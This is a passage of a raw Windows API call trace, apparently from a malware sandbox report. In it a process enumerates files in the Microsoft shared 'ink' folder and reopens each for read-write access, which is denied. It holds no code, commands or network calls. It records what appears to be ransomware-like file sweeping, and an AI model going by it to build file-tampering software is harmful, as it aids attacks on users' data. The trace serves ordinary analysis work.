InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.632] AreFileApisANSI () returned 1 [0084.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0084.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 62 [0084.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.780] GetFileType (hFile=0x364) returned 0x1 [0084.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0084.780] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.780] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.780] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.780] CloseHandle (hObject=0x364) returned 1 [0084.780] AreFileApisANSI () returned 1 [0084.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e1c8 [0084.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 62 [0084.781] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.781] GetLastError () returned 0x5 [0084.781] GetLastError () returned 0x5 [0084.781] SetLastError (dwErrCode=0x5) [0084.781] GetLastError () returned 0x5 [0084.781] SetLastError (dwErrCode=0x5) [0084.781] GetLastError () returned 0x5 [0084.781] SetLastError (dwErrCode=0x5) [0084.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0084.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0084.781] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.781] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.781] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsplk.xml", cAlternateFileName="")) returned 1 [0084.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0084.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0084.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0084.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0084.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0084.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0084.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0084.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.782] AreFileApisANSI () returned 1 [0084.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml", lpUsedDefaultChar=0x0) returned 62 [0084.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0084.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0084.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.782] AreFileApisANSI () returned 1 [0084.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e7a0 [0084.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 62 [0084.783] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.783] GetFileType (hFile=0x364) returned 0x1 [0084.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0084.783] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.783] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.783] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.783] CloseHandle (hObject=0x364) returned 1 [0084.783] AreFileApisANSI () returned 1 [0084.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0084.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 62 [0084.784] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.784] GetLastError () returned 0x5 [0084.784] GetLastError () returned 0x5 [0084.784] SetLastError (dwErrCode=0x5) [0084.784] GetLastError () returned 0x5 [0084.784] SetLastError (dwErrCode=0x5) [0084.784] GetLastError () returned 0x5 [0084.784] SetLastError (dwErrCode=0x5) [0084.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0084.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.784] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1ec00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="IpsPlugin.dll", cAlternateFileName="")) returned 1 [0084.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x604a8 [0084.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0084.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0084.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0084.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0084.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.785] AreFileApisANSI () returned 1 [0084.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll", lpUsedDefaultChar=0x0) returned 65 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d9a0 [0084.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0084.785] AreFileApisANSI () returned 1 [0084.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0084.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x820e8 [0084.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll") returned 65 [0084.786] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.786] GetFileType (hFile=0x364) returned 0x1 [0084.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0084.786] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.786] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.786] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.786] CloseHandle (hObject=0x364) returned 1 [0084.787] AreFileApisANSI () returned 1 [0084.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0084.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82058 [0084.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll") returned 65 [0084.787] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.787] GetLastError () returned 0x5 [0084.787] GetLastError () returned 0x5 [0084.787] SetLastError (dwErrCode=0x5) [0084.787] GetLastError () returned 0x5 [0084.787] SetLastError (dwErrCode=0x5) [0084.787] GetLastError () returned 0x5 [0084.787] SetLastError (dwErrCode=0x5) [0084.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0084.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d9a0 | out: hHeap=0x20000) returned 1 [0084.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.787] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8c6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsptb.xml", cAlternateFileName="")) returned 1 [0084.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0084.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0084.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0084.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0084.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0084.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0084.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0084.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.788] AreFileApisANSI () returned 1 [0084.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml", lpUsedDefaultChar=0x0) returned 62 [0084.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0084.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0084.788] RtlAllocateHeap 